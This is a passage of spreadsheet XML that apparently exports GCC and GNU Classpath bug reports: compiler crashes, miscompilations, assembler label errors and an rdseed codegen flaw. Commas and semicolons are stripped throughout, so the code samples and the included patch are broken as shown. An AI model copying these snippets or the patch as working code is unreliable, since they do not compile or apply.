struct A { void f () {} }
struct B : public A {}
struct C : public A {}
struct D : public B public C {}
typedef void (C::*cp) ()
typedef void (D::*dp) ()
int
main ()
{
  cp c = 
  dp d = c
  return (cp () == d) 
}</t>
  </si>
  <si>
    <t>CLASSPATH-24802</t>
  </si>
  <si>
    <t>BasicTreeUI falls into infinite recursion w/ custom TreeModel</t>
  </si>
  <si>
    <t>You get an infinite recursion in BasicTreeUI with this custom TreeModel.
Get the swing Genealogy demo here:
http://java.sun.com/docs/books/tutorial/uiswing/components/example-swing/
( GenealogyExample.javaGenealogyModel.javaGenealogyTree.javaPerson.java )
Click on Peter (grandpa) and then Show Ancestors to trigger the bug.</t>
  </si>
  <si>
    <t>GCC-20301</t>
  </si>
  <si>
    <t>Assembler labels have a leading -</t>
  </si>
  <si>
    <t>I am compiling a large jar file.
/opt/gcc-3.4.3-cvs/bin/gcj -c ../../kernel/kernel.jar --classpath=..:../kernel
-o kernel.o
/var/tmp//cct7Jptt.s: Assembler messages:
/var/tmp//cct7Jptt.s:103992: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:143015: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:169767: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:169775: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:179941: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:208865: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:225045: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:230975: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:231045: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:232434: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:232840: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:234117: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:235266: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:239572: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:240134: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:241111: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:243455: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:243858: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:246766: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:264795: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:272843: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:274270: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:276426: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:277635: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:278726: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:279508: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:296087: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:296150: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:296234: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:306372: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:406839: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:436738: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:530831: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:568280: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:582599: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:594217: Error: unknown pseudo-op: `.ll'
/var/tmp//cct7Jptt.s:652229: Error: unknown pseudo-op: `.ll'
make[2]: *** [kernel.o] Error 1
make[1]: *** [kernel.o] Error 2
make: *** [_SunOS_5.8_sparc] Error 2
The resulting *.s file has labels that contain - which causes as to fail.
If I hand remove the - from the .s file it compiles.
Here is a snipet of the resulting *.s code with the problem
.LLEHE635:
        restore
        jmp     %o7+8
         nop
        .align 4
        .align 4
.LL-1347440721:
        .word   .LL7725
        .word   .LL7697
        .word   .LL7726
        .word   .LL7727
        .word   .LL7728
        .word   .LL7729
I looks like the emitter has an int for the label counter instead of a uint.
[steve@helios are]$ gcc -v
Using built-in specs.
Configured with: ../configure --prefix=/opt/gcc-3.4.3-cvs --with-gnu-as
--with-gnu-ld
Thread model: posix
gcc version 4.0.0 20050120 (experimental)
[steve@helios are]$ gcj -v
Using built-in specs.
Reading specs from
/NetFuel/compilers/solaris-sparc-2.8/gcc-3.4.3-cvs/bin/../lib/gcc/sparc-sun-solaris2.8/4.0.0/../../../libgcj.spec
rename spec lib to liborig
Configured with: ../configure --prefix=/opt/gcc-3.4.3-cvs --with-gnu-as
--with-gnu-ld
Thread model: posix
gcc version 4.0.0 20050120 (experimental)</t>
  </si>
  <si>
    <t>GCC-66237</t>
  </si>
  <si>
    <t>[6 regression] FAIL: gcc.dg/tree-prof/pr34999.c compilation  -fprofile-use -D_PROFILE_USE (internal compiler error)</t>
  </si>
  <si>
    <t>$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.dg/tree-prof/pr34999.c -O2 -freorder-blocks-and-partition -fprofile-generate -D_PROFILE_GENERATE -lm -o pr34999.x01
$ ./pr34999.x01
$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.dg/tree-prof/pr34999.c -O2 -freorder-blocks-and-partition -fprofile-use -D_PROFILE_USE -lm -o pr34999.x02
../gcc/testsuite/gcc.dg/tree-prof/pr34999.c: In function â€˜mainâ€™:
../gcc/testsuite/gcc.dg/tree-prof/pr34999.c:44:1: internal compiler error: in as_a at is-a.h:192
 }
 ^
0xe72e5f rtx_jump_insn* as_a(rtx_insn*)
        ../../gcc/is-a.h:192
0xe72e5f fix_crossing_conditional_branches
        ../../gcc/bb-reorder.c:2047
0xe72e5f execute
        ../../gcc/bb-reorder.c:2742
f9a00e9e5f0f056b558f8615e3c030d37923ee72 is the first bad commit
commit f9a00e9e5f0f056b558f8615e3c030d37923ee72
Author: miyuki 
Date:   Wed May 20 19:39:42 2015 +0000
    Promote types of RTL expressions to more derived ones.</t>
  </si>
  <si>
    <t>GCC-68933</t>
  </si>
  <si>
    <t>ICE when mixing -fprofile-arcs -ftest-coverage and -fcoarray=lib on gcc-6 only</t>
  </si>
  <si>
    <t>Created attachment 37046
coarray-based distributed transpose
Compiling the attached file with the following command:
gfortran -fcoarray=lib -fprofile-arcs -ftest-coverage coarray_distributed_transpose.F90 -c
generates an ICE:
coarray_distributed_transpose.F90:107:0:
       use run_size
internal compiler error: Segmentation fault
0xb5d8df crash_signal
	../../gcc/toplev.c:334
0x7b5baf coverage_checksum_string
	../../gcc/coverage.c:500
0x7b6e36 coverage_compute_profile_id(cgraph_node*)
	../../gcc/coverage.c:583
0xe1a906 init_node_map(bool)
	../../gcc/value-prof.c:1240
0xc39b4e tree_profiling
	../../gcc/tree-profile.c:516
0xc39b4e execute
	../../gcc/tree-profile.c:642
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions
Using -fcoarray=single instead of -fcoarray=lib works fine.
Can it be related to bug 46989 
The bug has been found by Zaak Beekman.
The system is a x86_64-pc-linux-gnu.
gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/home/alex/Downloads/gcc/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../configure --prefix=/home/alex/Downloads/gcc --enable-languages=cc++fortran --disable-multilib --disable-libgcj --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20151210 (experimental) (GCC)</t>
  </si>
  <si>
    <t>fanfarillo.gcc</t>
  </si>
  <si>
    <t>GCC-48240</t>
  </si>
  <si>
    <t>libgo assertion failure at runtime/mem.c:114 on 64-bit Solaris 10</t>
  </si>
  <si>
    <t>Unlike Solaris 11/x86 several go and libgo tests fail on 64-bit Solaris 10 (both
SPARC and x86):
FAIL: go.go-torture/execute/array-1.go execution  -O0 
/vol/gcc/src/hg/trunk/local/libgo/runtime/mem.c:114: libgo assertion failure
runtime: address space conflict: map(f840000000) = fffffb7ffbb7e000
I suppose this is because Solaris &lt; 11 doesn't honor the addr parameter to
mmap(2) without MAP_FIXED (cf. gcc/config/host-solaris.c) but haven't yet
checked in detail.</t>
  </si>
  <si>
    <t>GCC-41829</t>
  </si>
  <si>
    <t>[OOP] Runtime error with dynamic dispatching</t>
  </si>
  <si>
    <t>Hello</t>
  </si>
  <si>
    <t>GCC-72717</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE: in emit_move_insn at expr.c:3693 with vector shift @ powerpc64le</t>
  </si>
  <si>
    <t>Created attachment 39026
reduced testcase
Compiler output:
$ powerpc64le-unknown-linux-gnu-gcc -v         
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-powerpc64le/bin/powerpc64le-unknown-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-238792-checking-yes-rtl-df-extra-nographite-powerpc64le/bin/../libexec/gcc/powerpc64le-unknown-linux-gnu/7.0.0/lto-wrapper
Target: powerpc64le-unknown-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --with-sysroot=/usr/powerpc64le-unknown-linux-gnu --target=powerpc64le-unknown-linux-gnu --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=powerpc64le-unknown-linux-gnu --with-ld=/usr/bin/powerpc64le-unknown-linux-gnu-ld --with-as=/usr/bin/powerpc64le-unknown-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-238792-checking-yes-rtl-df-extra-nographite-powerpc64le
Thread model: posix
gcc version 7.0.0 20160727 (experimental) (GCC) 
$ powerpc64le-unknown-linux-gnu-gcc testcase.c -w
testcase.c: In function 'foo':
testcase.c:6:12: internal compiler error: in emit_move_insn at expr.c:3693
   return v &lt;&lt; v[0]
          ~~^~~~~~~
0x826623 emit_move_insn(rtx_def* rtx_def*)
        /repo/gcc-trunk/gcc/expr.c:3692
0x802a27 force_reg(machine_mode rtx_def*)
        /repo/gcc-trunk/gcc/explow.c:637
0xef2179 rs6000_expand_vector_init(rtx_def* rtx_def*)
        /repo/gcc-trunk/gcc/config/rs6000/rs6000.c:6711
0x105df1b gen_vec_initv2df(rtx_def* rtx_def*)
        /repo/gcc-trunk/gcc/config/rs6000/vector.md:841
0xa73ab8 insn_gen_fn::operator()(rtx_def* rtx_def*) const
        /repo/gcc-trunk/gcc/recog.h:301
0xa73ab8 expand_vector_broadcast
        /repo/gcc-trunk/gcc/optabs.c:393
0xa73ab8 expand_binop(machine_mode optab_tag rtx_def* rtx_def* rtx_def* int optab_methods)
        /repo/gcc-trunk/gcc/optabs.c:1234
0x808241 expand_shift_1
        /repo/gcc-trunk/gcc/expmed.c:2442
0x83747b expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /repo/gcc-trunk/gcc/expr.c:9171
0x706ca1 expand_gimple_stmt_1
        /repo/gcc-trunk/gcc/cfgexpand.c:3686
0x706ca1 expand_gimple_stmt
        /repo/gcc-trunk/gcc/cfgexpand.c:3746
0x70876e expand_gimple_basic_block
        /repo/gcc-trunk/gcc/cfgexpand.c:5753
0x70e39e execute
        /repo/gcc-trunk/gcc/cfgexpand.c:6367
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-80180</t>
  </si>
  <si>
    <t>Incorrect codegen from rdseed intrinsic use (CVE-2017-11671)</t>
  </si>
  <si>
    <t>Created attachment 41051
Preprocessed source file
When the attached source is compiled the resulting assembly improperly handles the success bit (CF) for rdseed.  The instruction immediately following rdseed %rax is testl %r8d r8d which clears CF.  The debug information does identify the setc that should follow rdseed but it is no where near the rdseed instruction.
gcc -v output:
Using built-in specs.
COLLECT_GCC=./prebuilt/downloads/x86_64-elf-6.2.0-Linux-x86_64/bin/x86_64-elf-gcc
COLLECT_LTO_WRAPPER=/home/teisenbe/src/magenta/magenta/prebuilt/downloads/x86_64-elf-6.2.0-Linux-x86_64/bin/../libexec/gcc/x86_64-elf/6.2.0/lto-wrapper
Target: x86_64-elf
Configured with: ../gcc-6.2.0/configure --with-included-gettext --target=x86_64-elf --prefix=/home/phosek/fuchsia/third_party/gcc_none_toolchains/x86_64-elf-6.2.0-Linux-x86_64 --enable-languages=cc++ --disable-werror --enable-initfini-array
Thread model: single
gcc version 6.2.0 (GCC) 
Command used to generate:
./prebuilt/downloads/x86_64-elf-6.2.0-Linux-x86_64/bin/x86_64-elf-gcc -O2  -g -finline -include ./build-magenta-pc-x86-64/config-global.h -Wall -Wextra -Wno-multichar -Werror -Wno-error=deprecated-declarations -Wno-unused-parameter -Wno-unused-function -Wno-unused-label -Werror=return-type -fno-common -Wno-nonnull-compare -fasynchronous-unwind-tables -ffunction-sections -fdata-sections -fno-pic -ffreestanding -include ./build-magenta-pc-x86-64/config-kernel.h -Wformat=2 -Wformat-signedness -fno-omit-frame-pointer -falign-jumps=1 -falign-loops=1 -falign-functions=4 -msoft-float -mno-mmx -mno-sse -mno-sse2 -mno-3dnow -mno-avx -mno-avx2 -mno-80387 -mno-fp-ret-in-387 -mcmodel=kernel -mno-red-zone -mskip-rax-setup   -mrdseed --include ./build-magenta-pc-x86-64/dev/intel_rng/config-module.h --std=c11 -Werror-implicit-function-declaration -Wstrict-prototypes -Wwrite-strings  -Wmissing-prototypes   -Isystem/public -Isystem/private -I./build-magenta-pc-x86-64/gen/include -I./build-magenta-pc-x86-64 -Ikernel/include -Isystem/include -Ithird_party/include -Ikernel/target/pc-x86/include -Ikernel/platform/pc/include -Ikernel/arch/x86/include -Ikernel/top/include -Ikernel/kernel/include -Ikernel/app/include -Ikernel/app/stringtests/include -Ikernel/app/tests/include -Ikernel/dev/include -Ikernel/dev/intel_rng/include -Ikernel/dev/interrupt/include -Ikernel/dev/pcie/include -Isystem/ulib/bitmap/include -Ikernel/lib/bitmap/include -Ikernel/lib/cbuf/include -Ikernel/lib/debugcommands/include -Ikernel/lib/debuglog/include -Ikernel/lib/fixed_point/include -Ikernel/lib/gfxconsole/include -Ikernel/lib/ktrace/include -Ikernel/lib/mtrace/include -Ikernel/lib/pow2_range_allocator/include -Ikernel/lib/syscalls/include -Ikernel/lib/userboot/include -Ikernel/lib/version/include -Ikernel/platform/include -Ikernel/target/include -Ithird_party/lib/acpica/source/include -Ithird_party/lib/acpica/include -Ikernel/dev/hw_rng/include -Ikernel/kernel/vm/include -Ikernel/lib/console/include -Ikernel/lib/crypto/include -Ikernel/lib/debug/include -Ikernel/lib/font/include -Ikernel/lib/gfx/include -Ikernel/lib/header_tests/include -Ikernel/lib/heap/include -Ikernel/lib/heap/include -Ikernel/lib/libc/include -Ikernel/lib/magenta/include -Ikernel/lib/mxtl/include -Isystem/ulib/mxtl/include -Ikernel/lib/mxtl/include -Isystem/ulib/region-alloc/include -Ikernel/lib/region-alloc/include -Ikernel/lib/unittest/include -Ikernel/lib/user_copy/include -Ikernel/lib/vdso/include -Ithird_party/lib/safeint/source/include -Ithird_party/lib/safeint/include -Ikernel/dev/udisplay/include -Ikernel/lib/dpc/include -Ikernel/lib/heap/cmpctmalloc/include -Ikernel/lib/io/include -Ithird_party/ulib/cryptolib/include -Ithird_party/lib/cryptolib/include -Ithird_party/ulib/qrcodegen/include -Ithird_party/lib/qrcodegen/include -c kernel/dev/intel_rng/intel-rng.c -MD -MP -MT build-magenta-pc-x86-64/dev/intel_rng/kernel/dev/intel_rng/intel-rng.c.o -MF build-magenta-pc-x86-64/dev/intel_rng/kernel/dev/intel_rng/intel-rng.c.d -o build-magenta-pc-x86-64/dev/intel_rng/kernel/dev/intel_rng/intel-rng.c.o --save-temps
Compiler console output: None</t>
  </si>
  <si>
    <t>teisenbe</t>
  </si>
  <si>
    <t>GCC-68746</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/read_dir.f90   -O0  execution test</t>
  </si>
  <si>
    <t>spawn /test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/ /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/read_dir.f90 -fno-diagnostics-show-caret -fdiagnostics-color=never -O0 -pedantic-errors -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libatomic/.libs -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs -lm -o ./read_dir.exe
PASS: gfortran.dg/read_dir.f90   -O0  (test for excess errors)Setting LD_LIBRARY_PATH to .:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libatomic/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gcc:.:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libatomic/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gcc
spawn [open ...]
Program aborted. Backtrace:
Could not print backtrace: backtrace library does not support threads
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
Backtrace for this error:
Could not print backtrace: backtrace library does not support threads
FAIL: gfortran.dg/read_dir.f90   -O0  execution test
Similar fails:
FAIL: gfortran.dg/read_dir.f90   -O1  execution test
FAIL: gfortran.dg/read_dir.f90   -O2  execution test
FAIL: gfortran.dg/read_dir.f90   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  execution test
FAIL: gfortran.dg/read_dir.f90   -O3 -g  execution test
FAIL: gfortran.dg/read_dir.f90   -Os  execution test</t>
  </si>
  <si>
    <t>GCC-745</t>
  </si>
  <si>
    <t>ICE when using 'while' as a 'for' statement</t>
  </si>
  <si>
    <t>Somehow I managed to write the following statement
while (int x = 0 x &lt; 10 x++) { }
it created the following error:
while_for.C: In function `int main ()':
while_for.C:2: parse error before `'
while_for.C:2: parse error before `)'
while_for.C:2: Internal error #122.
while_for.C:2: Internal compiler error in finish_function at
../gcc/cp/decl.c:14422
Release:
gcc version 2.96 20000731
Environment:
Red Hat Linux 7.0
How-To-Repeat:
gcc while_for.C -o wf</t>
  </si>
  <si>
    <t>GCC-55862</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in compute_antic at tree-ssa-pre.c:2495</t>
  </si>
  <si>
    <t>Hi ! The following testcase makes GCC 4.8.0 as of 20130103 crash at -O2.
It may be related to PR55348 (which was probably a dup anyway).
$ cat antic.c
int g a *b
void f(void)
{
    int *p
    if(g)
    {
        int **k = 
        if(0)
        {
            while(g++)
                for(*b = 0 *b b++)
label1:
        }
        for( g p++)
            for(a = 0 a &lt; 1 a++)
            {
                int *c = p
label2:
                if(a &lt; 1)
                    *c = 0
            }
        goto label1
    }
    goto label2
}
$ xgcc -O2 -w antic.c
antic.c: In function â€˜fâ€™:
antic.c:3:6: internal compiler error: in compute_antic at tree-ssa-pre.c:2495
 void f(void)
      ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-18623</t>
  </si>
  <si>
    <t>4 * libiberty local variables set but never used</t>
  </si>
  <si>
    <t>Hello there
I just tried to compile the gcc343 with the Intel C compiler version 8.1
on Linux Fedora Core 2.
Here is an extract from the results
../../src/gcc-3.4.3/libiberty/cplus-dem.c(979): remark #593: variable
at_start_name was set but never used
../../src/gcc-3.4.3/libiberty/cplus-dem.c(2043): remark #593: variable start
was set but never used
../../src/gcc-3.4.3/libiberty/cp-demangle.c(1636): remark #593: variable
offset was set but never used
../../src/gcc-3.4.3/libiberty/cp-demangle.c(1637): remark #593: variable
virtual_offset was set but never used
Suggest delete these four local variables since they do nothing useful.</t>
  </si>
  <si>
    <t>GCC-14288</t>
  </si>
  <si>
    <t>[tree-ssa] [SRA] warning: 'SR.29591' may be used uninitialized in this function</t>
  </si>
  <si>
    <t>Take the testcase generate-3.4.ii from PR8361 and compile with -c -W -O2:
generate.C: In member function `bool
MODEL_GENERATOR::possibleInferenceFromWeakConstraint(const GWEAKCONSTRAINT&amp;
const COST&amp;) const':
generate.C:2964: warning: 'SR.29591' may be used uninitialized in this function
generate.C:2965: warning: 'SR.29593' may be used uninitialized in this function
generate.C: In member function `bool
MODEL_GENERATOR::PropagatePositiveFromUndefined(const GATOM&amp; GINTERPRET&amp;)':
generate.C:2965: warning: 'SR.48780' may be used uninitialized in this function
generate.C:2964: warning: 'SR.48778' may be used uninitialized in this function
generate.C: In member function `bool MODEL_GENERATOR::PropagateMustBeTrue(const
GATOM&amp; GINTERPRET&amp;)':
generate.C:2965: warning: 'SR.49389' may be used uninitialized in this function
generate.C:2964: warning: 'SR.49387' may be used uninitialized in this function
generate.C: In member function `bool MODEL_GENERATOR::PropagateNegative(const
GLITERAL&amp; GINTERPRET&amp;)':
generate.C:2965: warning: 'SR.49989' may be used uninitialized in this function
generate.C:2964: warning: 'SR.49987' may be used uninitialized in this function
generate.C: In member function `bool MODEL_GENERATOR::Propagate(GINTERPRET&amp;)':
generate.C:2965: warning: 'SR.50358' may be used uninitialized in this function
generate.C:2964: warning: 'SR.50356' may be used uninitialized in this function
generate.C: In member function `bool
MODEL_GENERATOR::ComputeWellFounded(GINTERPRET&amp;)':
generate.C:2965: warning: 'SR.51068' may be used uninitialized in this function
generate.C:2964: warning: 'SR.51066' may be used uninitialized in this function
Clearly we should never warn about variables which even don't appear in the
users's source like SR.50358.</t>
  </si>
  <si>
    <t>GCC-82361</t>
  </si>
  <si>
    <t>Useless mov eax eax in generated code</t>
  </si>
  <si>
    <t>Following function
struct ret_t {
    unsigned quot rem
}
ret_t my_div(unsigned a unsigned b) {
    return {a / b a % b}
}
Produces suboptimal assembly:
my_div(unsigned int unsigned int):
  mov eax edi
  xor edx edx
  div esi
  sal rdx 32
  mov eax eax  # &lt;======
  or rax rdx
  ret
Clang produces an assembly without mov eax eax instead:
my_div(unsigned int unsigned int): # @my_div(unsigned int unsigned int)
  xor edx edx
  mov eax edi
  div esi
  shl rdx 32
  or rax rdx
  ret</t>
  </si>
  <si>
    <t>GCC-47155</t>
  </si>
  <si>
    <t>[4.6 Regression] ccp caused miscompilation</t>
  </si>
  <si>
    <t>[regehr@gamow tmp438]$ current-gcc -O0 small.c -o small
[regehr@gamow tmp438]$ ./small
1
[regehr@gamow tmp438]$ current-gcc -O1 small.c -o small
[regehr@gamow tmp438]$ ./small
0
[regehr@gamow tmp438]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r168402-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r168402-install --program-prefix=r168402- --enable-languages=cc++
Thread model: posix
gcc version 4.6.0 20110102 (experimental) (GCC) 
[regehr@gamow tmp438]$ cat small.c
static unsigned int g_1
static signed char g_2 = 0x81
int printf(const char *format ...)
static unsigned char foo(unsigned char p1 unsigned char p2)
{
    return p1 * p2
}
int main (void)
{
    int l_5[2]
    int i
    for (i = 0 i &lt; 2 i++)
        l_5[i] = 1
    g_1 = g_2 &lt;= foo(-6 l_5[0])
    printf(%u\n g_1)
    return 0
}</t>
  </si>
  <si>
    <t>GCC-62034</t>
  </si>
  <si>
    <t>ICE for big statically initialized arrays compiled with LTO</t>
  </si>
  <si>
    <t>Created attachment 33259
Reproducer
I get ICE when try to compile tests with big amount of statically initialized data.
gcc --version
gcc (GCC) 4.10.0 20140806 (experimental)
Copyright (C) 2014 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
gcc -flto test.c
gcc: internal compiler error: Segmentation fault (program lto1)
0x405c80 execute
        ../../gcc-ref/gcc/gcc.c:2900
0x409fe9 do_spec_1
        ../../gcc-ref/gcc/gcc.c:4704
0x40d475 process_brace_body
        ../../gcc-ref/gcc/gcc.c:5987
0x40d2b1 handle_braces
        ../../gcc-ref/gcc/gcc.c:5901
0x40bf9d do_spec_1
        ../../gcc-ref/gcc/gcc.c:5358
0x40d475 process_brace_body
        ../../gcc-ref/gcc/gcc.c:5987
0x40d2b1 handle_braces
        ../../gcc-ref/gcc/gcc.c:5901
0x40bf9d do_spec_1
        ../../gcc-ref/gcc/gcc.c:5358
0x40c38c do_spec_1
        ../../gcc-ref/gcc/gcc.c:5473
0x40d475 process_brace_body
        ../../gcc-ref/gcc/gcc.c:5987
0x40d2b1 handle_braces
        ../../gcc-ref/gcc/gcc.c:5901
0x40bf9d do_spec_1
        ../../gcc-ref/gcc/gcc.c:5358
0x409664 do_spec_2
        ../../gcc-ref/gcc/gcc.c:4405
0x409582 do_spec(char const*)
        ../../gcc-ref/gcc/gcc.c:4372
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: gcc-ref-build/bin/gcc returned 4 exit status
compilation terminated.
/usr/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status
Debugger shows that problem appears when lto_input_tree tries to dig through a bunch of SCC entries in input stream.  Each SCC entry cause two new functions (lto_input_tree and lto_input_tree_1) in the call stack.  With many consequent SCC entries stack may grow too much (in my case compiler segfaulted with ~600 000 entries in the call stack).
Attached test has a statically initialized array with a million elements.  Bigger data set may be required to break the compiler if you use increased stack size.
Problem appeared after this commit: https://gcc.gnu.org/ml/gcc-cvs/2014-07/msg00291.html
Following patch removing recursion helps me to compile my tests:
diff --git a/gcc/lto-streamer-in.c b/gcc/lto-streamer-in.c
index 698f926..25657da 100644
--- a/gcc/lto-streamer-in.c
+++ b/gcc/lto-streamer-in.c
@@ -13457 +134516 @@ lto_input_tree_1 (struct lto_input_block *ib struct data_in *data_in
 tree
 lto_input_tree (struct lto_input_block *ib struct data_in *data_in)
 {
-  return lto_input_tree_1 (ib data_in streamer_read_record_start (ib) 0)
+  enum LTO_tags tag
+
+  /* Skip SCC entries.  */
+  while ((tag = streamer_read_record_start (ib)) == LTO_tree_scc)
+    {
+      unsigned len entry_len
+      lto_input_scc (ib data_in 
+    }
+
+  return lto_input_tree_1 (ib data_in tag 0)
 }
Did not fully test this patch yet.</t>
  </si>
  <si>
    <t>enkovich.gnu</t>
  </si>
  <si>
    <t>GCC-79849</t>
  </si>
  <si>
    <t>diagnostics: typo in type %qT itself violate the C++ One Definition Rule</t>
  </si>
  <si>
    <t>from ipa-devirt.c:
inform (loc_t1
        type %qT itself violate the C++ One Definition Rule t1)
The violate should probably be violates.</t>
  </si>
  <si>
    <t>GCC-45444</t>
  </si>
  <si>
    <t>[4.6 regression] ARM bootstrap failure: uninitialized const member in 'neon_builtin_datum' is invalid in C++ [-Werror=c++-compat]</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.6-20100828 on armv5tel-linux-gnueabi fails in stage 2 with:
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c: In function 'arm_get_pcs_model':
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:3725:7: error: passing argument 1 of 'stdarg_p' discards 'const' qualifier from pointer target type [-Werror]
/home/mikpe/gcc-4.6-20100828/gcc/tree.h:4851:13: note: expected 'tree' but argument is of type 'const_tree'
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c: In function 'locate_neon_builtin_icode':
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:18913:22: error: uninitialized const member in 'neon_builtin_datum' is invalid in C++ [-Werror=c++-compat]
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:17969:20: note: 'itype' should be initialized
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:18913:22: error:  in 'neon_builtin_datum' is invalid in C++ [-Werror=c++-compat]
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:17970:13: note: 'bits' should be initialized
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:18913:22: error: uninitialized const member in 'neon_builtin_datum' is invalid in C++ [-Werror=c++-compat]
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:17971:24: note: 'codes' should be initialized
